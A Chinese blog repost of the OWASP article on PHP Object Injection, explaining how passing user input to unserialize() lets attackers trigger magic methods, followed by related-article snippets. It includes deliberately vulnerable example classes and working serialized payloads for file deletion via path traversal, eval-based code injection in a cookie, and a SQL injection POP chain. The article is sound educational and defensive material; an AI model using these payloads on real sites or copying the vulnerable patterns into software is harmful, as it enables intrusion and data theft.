PHP Object Injection

最新推荐文章于 2024-08-10 20:38:10 发布
最新推荐文章于 2024-08-10 20:38:10 发布
阅读量163 收藏
点赞数
文章标签: php json
原文链接:http://www.cnblogs.com/qdfu/p/5660242.html
版权

http://www.phpchina.com/portal.php?mod=view&aid=39852

https://crowdshield.com/blog.php?name=exploiting-php-serialization-object-injection-vulnerabilities 

https://www.owasp.org/index.php/PHP_Object_Injection

http://netsecurity.51cto.com/art/201502/464982.htm 

Description

PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks, such as Code Injection, SQL Injection, Path Traversal and Application Denial of Service, depending on the context. The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope.

In order to successfully exploit a PHP Object Injection vulnerability two conditions must be met:

  • The application must have a class which implements a PHP magic method (such as __wakeup or __destruct) that can be used to carry out malicious attacks, or to start a "POP chain".
  • All of the classes used during the attack must be declared when the vulnerable unserialize() is being called, otherwise object autoloading must be supported for such classes.

Examples

Example 1

The example below shows a PHP class with an exploitable __destruct method:

class Example1
{
   public $cache_file;

   function __construct()
   {
      // some PHP code...
   }

   function __destruct()
   {
      $file = "/var/www/cache/tmp/{$this->cache_file}";
      if (file_exists($file)) @unlink($file);
   }
}

// some PHP code...

$user_data = unserialize($_GET['data']);

// some PHP code...

In this example an attacker might be able to delete an arbitrary file via a Path Traversal attack, for e.g. requesting the following URL:

http://testsite.com/vuln.php?data=O:8:"Example1":1:{s:10:"cache_file";s:15:"../../index.php";}

Example 2

The example below shows a PHP class with an exploitable __wakeup method:

class Example2
{
   private $hook;

   function __construct()
   {
      // some PHP code...
   }

   function __wakeup()
   {
      if (isset($this->hook)) eval($this->hook);
   }
}

// some PHP code...

$user_data = unserialize($_COOKIE['data']);

// some PHP code...

In this example an attacker might be able to perform a Code Injection attack by sending an HTTP request like this:

GET /vuln.php HTTP/1.0
Host: testsite.com
Cookie: data=O%3A8%3A%22Example2%22%3A1%3A%7Bs%3A14%3A%22%00Example2%00hook%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D
Connection: close

Where the cookie parameter "data" has been generated by the following script:

class Example2
{
   private $hook = "phpinfo();";
}

print urlencode(serialize(new Example2));

Example 3

This last example shows how it is possible to perform a SQL Injection attack using a "POP chain", for instance by leveraging a __toString method like this:

class Example3
{
   protected $obj;

   function __construct()
   {
      // some PHP code...
   }

   function __toString()
   {
      if (isset($this->obj)) return $this->obj->getValue();
   }
}

// some PHP code...

$user_data = unserialize($_POST['data']);

// some PHP code...

If the $user_data variable is an "Example3" object and it will be treated like a string somewhere in the code, then its __toString method will be called. Since this method will call the getValue method of the object stored into the "obj" property, it's possible to set that property to an arbitrary object, and execute its getValue method, if it is accessible, otherwise its __call method will be called, if it is defined. For the sake of ease, just think that when unserialize() is called, the class below is available within the application scope (or supported by autoloading):

class SQL_Row_Value
{
   private $_table;

   // some PHP code...

   function getValue($id)
   {
      $sql = "SELECT * FROM {$this->_table} WHERE id = " . (int)$id;
      $result = mysql_query($sql, $DBFactory::getConnection());
      $row = mysql_fetch_assoc($result);

      return $row['value'];
   }
}

In this example an attacker might be able to perform a SQL Injection attack by sending a POST request containing a "data" parameter generated by a script like this:

class SQL_Row_Value
{
   private $_table = "SQL Injection";
}

class Example3
{
   protected $obj;

   function __construct()
   {
      $this->obj = new SQL_Row_Value;
   }
}

print urlencode(serialize(new Example3));

Related Controls

Prevention

Do not use unserialize() function with user-supplied input, use JSON functions instead.

转载于:https://www.cnblogs.com/qdfu/p/5660242.html

weixin_30472035
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Lab: Arbitrary object injection in PHPPHP中任意对象的注入(反序列化漏洞)
Zeker62的博客
08-23 686
靶场内容 本实验使用基于序列化的会话机制,因此容易受到任意对象注入的影响。为了解决实验室问题,创建并注入恶意序列化对象以morale.txt从 Carlos 的主目录中删除文件。您需要获得源代码访问权限才能解决此实验。 您可以使用以下凭据登录自己的帐户: wiener:peter 有时,您可以通过将波浪号 ( 附加~)到文件名以检索编辑器生成的备份文件来读取源代码。 漏洞解析 这个属于是创建...
PHP Object InjectionPHP对象注入)
Bendawang's Blog
03-18 4781
PHP Object InjectionPHP对象注入)
深入讲解PHP的对象注入(Object Injection)
12-19
前言 虽然这篇文章叫做PHP对象注入,但是本质上还是和PHP的序列化的不正确使用有关。如果你阅读了PHP中的SESSION反序列化机制对序列化就会有一个大致的认识。PHP对象注入其实本质上也是由于序列化引起的。 基础知识 在php类中可能会存在一些叫做魔术函数(magic 函数),这些函数会在类进行某些事件的时候自动触发,例如__construct()会在一个对象被创建时调用, __destruct()会在一个对象销毁时调用, __toString当对象被当做一个字符串的时候被调用。常见的魔术函数有__construct() 、 __destruct() 、 __toString() 、 __
PHP Objiect Injection
最新发布
qq_67812668的博客
08-10 1104
PHP反序列化漏洞是一种非常危险的安全漏洞,存在于使用PHP的应用程序中。PHP反序列化的核心思想还是在于unserialize函数,漏洞利用的核心思路在于控制魔术方法中的代码从而产生代码注入,SQL注入,目录遍历等一系列的漏洞利用。防御本漏洞就要严格控制unserialize函数的参数,对unserialize后的变量内容进行检查,确保绿色输入。
php注入源码,深入讲解PHP的对象注入(Object Injection)
weixin_39562197的博客
03-10 545
前言虽然这篇文章叫做PHP对象注入,但是本质上还是和PHP的序列化的不正确使用有关。如果你阅读了PHP中的SESSION反序列化机制对序列化就会有一个大致的认识。PHP对象注入其实本质上也是由于序列化引起的。基础知识在php类中可能会存在一些叫做魔术函数(magic 函数),这些函数会在类进行某些事件的时候自动触发,例如__construct()会在一个对象被创建时调用,__destruct()会...
PHP命令注入 Command injection
weixin_30415113的博客
11-05 158
命令注入攻击(Command Injection),是指黑客通过利用HTML代码输入机制缺陷(例如缺乏有效验证限制的表格域)来改变网页的动态生成的内容。从而可以使用系统命令操作,实现使用远程数据来构造要执行的命令的操作。 PHP中可以使用下列四个函数来执行外部的应用程序或函数:system、exec、passthru、shell_exec,四个函数的原型如下: string s...
phpmailer实现邮件发送
weixin_34192993的博客
03-09 2158
phpmailer实现邮件发送 1.代码 <?php require("class.phpmailer.php"); //这个是一个smtp的php文档,网上可以下载得到 $mail = new PHPMailer(); //建立邮件发送类 $mail->CharSet = "UTF-8"; $address ="jiqing9006@qq.com"; $mail->IsSMTP...
LKWA靶场算是DVWA进阶吧
09-24
LKWA靶场 包含以下漏洞: - Blind RCE - XSSI - PHAR Deserialization - PHP Object Injection - PHP Object Injection via Cookies - PHP Object Injection (Object Reference) - SSRF - Variables variable
XVWA PHP Object Injection
baynk的博客
04-01 233
0x00 原文介绍 Though PHP Object Injection is not a very common vulnerability and also difficult to exploit, but it is found to be really dangerous vulnerbility as this could lead an attacker to perform di...
PHP对象注入 PHP Object Injection
a_18067的博客
05-24 199
From:PHP Object Injection Last revision (mm/dd/yy): 01/7/2015 译者:李秋豪 Wednesday, 24. May 2017 05:48PM 描述 PHP对象注入是一个允许骇客展开各种恶意攻击的应用级漏洞,比如说代码注入 ,SQL注入 ,目录遍历 和应用程序拒绝服务 (取决于具体的上下文/环境)。当用户的请求在传给反序列化函数...
php对象注入,PHP序列化/对象注入漏洞分析
weixin_30376865的博客
03-11 184
本文是关于PHP序列化/对象注入漏洞分析的短篇,里面讲述了如何获取主机的远程shell。如果你想自行测试这个漏洞,你可以通过 XVWA 和 Kevgir 进行操作。漏洞利用的第一步,我们开始测试目标应用是否存在PHP序列化。为了辅助测试,我们使用了Burpsuite的SuperSerial插件,下载地址在 这里 。它会被动检测PHP和Java序列化的存在。分析我们检测到了应用里使用了PHP序列化,...
PHP反序列化漏洞解析
kali_Ma的博客
11-18 886
举一个最简单的例子,在C中,若要开发一个数据库,那么一定涉及到数据的存储,要将内存中的数据持久化的保存在磁盘中,这就要对数据的存储格式进行优化,比如使用结构体保存一个数据对象,结构体是存在默认对齐机制的,所以实际上结构体的大小会大于其中实际数据的大小,如果直接将结构体对象写在内存一定会造成内存空间的泄露,因此为了优化,可以将结构体存储的每个数据memcpy出,并紧凑排列并写入内存,这就是最简单的一种序列化。
LKWA靶场通关和源码分析
Aiwin的博客
02-10 1050
简单好玩的lkwa靶场通关和源码分析
BUUCTF笔记之Basic部分WP
克格莫(有需要的私信)
06-04 4925
1.Linux Labs 这题就是熟悉一下ssh了。 登录找到flag.txt: 2.Java Sec Code 这题有点无语,感觉更像是宣传Java Sec Code这个项目。 拿flag:http://057bfb68-fe8f-4ecb-ad38-ad35f029e01b.node3.buuoj.cn/rce/exec?cmd=env 题外话,对于学习java漏洞来说,这个github项目确实是很好的,我们不能仅仅局限于拿flag刷分数,更多的是要深入研究代码背后的思想。 .
PortSwigger Academy | Information disclosure vulnerabilities : 信息泄漏漏洞
水榭山寺花烂漫,凤凰集外雁归来。敢与云峰争秀色,妙雨莲花九重开。
01-27 1775
11111111111111
hgame-2018 CTFwp(杭电信安)week3
苟有恒,必有三更眠,五更起。
03-04 1451
送分的sqli这题没有任何过滤什么的,真的是很简单了。 1 and 1=-1 union select 1,schema_name from information_schema.schemata查看库名,得:1 information_schema 1 test 1 week3_sqliiii2?id=1 and 1=-1 union select 1,table_name f
Laravel 5.3入门指南:从零开始构建应用
1. **依赖注入**:Laravel 5.3 强调组件之间的松耦合,通过依赖注入(Dependency Injection)来管理服务,使得代码更加模块化,提高了可维护性和扩展性。 2. **接口与契约**:作者会引导读者理解接口(Interface)...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值